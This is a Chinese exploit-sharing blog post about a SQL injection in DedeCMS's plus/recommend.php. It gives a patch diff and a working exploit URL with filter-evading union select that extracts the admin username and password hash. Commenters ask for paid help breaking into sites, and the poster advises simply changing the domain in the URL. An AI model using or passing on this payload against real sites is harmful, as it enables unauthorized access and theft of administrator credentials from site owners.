DedeCms recommend.php注入

from:http://p2j.cn/?p=798
对比了下补丁文件

//正在比较文件 3.php 和 4.PHP
//***** 修补后.php
}
//$$_key = $_FILES[$_key]['tmp_name'] = str_replace("\\\\", "\\", $_FILES[$_key]['tmp_name']);
$$_key = $_FILES[$_key]['tmp_name'] = $_FILES[$_key]['tmp_name'];
${$_key.'_name'} = $_FILES[$_key]['name'];
//***** 修补前.PHP
}
$$_key = $_FILES[$_key]['tmp_name'] = str_replace("\\\\", "\\", $_FILES[$_key]['tmp_name']);
//吧$_FILES[$_key]['tmp_name']里面的\\\\替换为\\
${$_key.'_name'} = $_FILES[$_key]['name'];
/*****以下属于意淫时间

?_FILES[aid][name]=0&_FILES[aid][type]=1&_FILES[aid][size]=1&_FILES[aid][tmp_name]=abc\'
补前 可以使 $aid 的值为 abc\\' 具体不清楚

*******意淫完毕********/

只是提供exp:

http://0day5.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294

测试效果:
exp

12 条评论

  1. wakeme

    老大 能不能教教我这招,有偿!

    1. 0day5
      @wakeme

      里面附带exp了的啊,你把url里面的域名修改下就好了

  2. regal2002

    老大,能否帮忙拿个站。dede的,各种0day都试了,没有plus目录,只暴出个后台路径,实在没辙了,有偿!

    1. regal2002 你好!
      @regal2002

      后台路径怎么爆!

      1. 0day5
        @regal2002 你好!

        我也想知道后台怎么爆...求提供消息

        1. secye
          @0day5

          站长很逗 :razz:

          1. 0day5
            @secye

            逗逗更健康...总体来说,人品还行,技术还行,眼光还行,长的不行

            1. 夏宇
              @0day5

              我看成长得还行,,,,

              1. 0day5
                @夏宇

                你见过那屌丝了啊~长的丑不丑,据说又矮又胖又搓,是不是真的。

    2. 0day5
      @regal2002

      不好意思,我们只是提供漏洞共享,所有的漏洞都是本地测试或者采集于网络(虽然大多数是采集自网络),但是并不会参与任何网站的渗透测试(主要是真不懂渗透)。

  3. adshy

    三个exp这个没成功,最新那篇成功了,那两个都能爆出密码,或许有旧版 新版

  4. 熊胆

    我提交了,怎么是
    DedeCMS 提示信息!
    无法把未知文档推荐给好友!
    如果你的浏览器没反应,请点击这里...

发表评论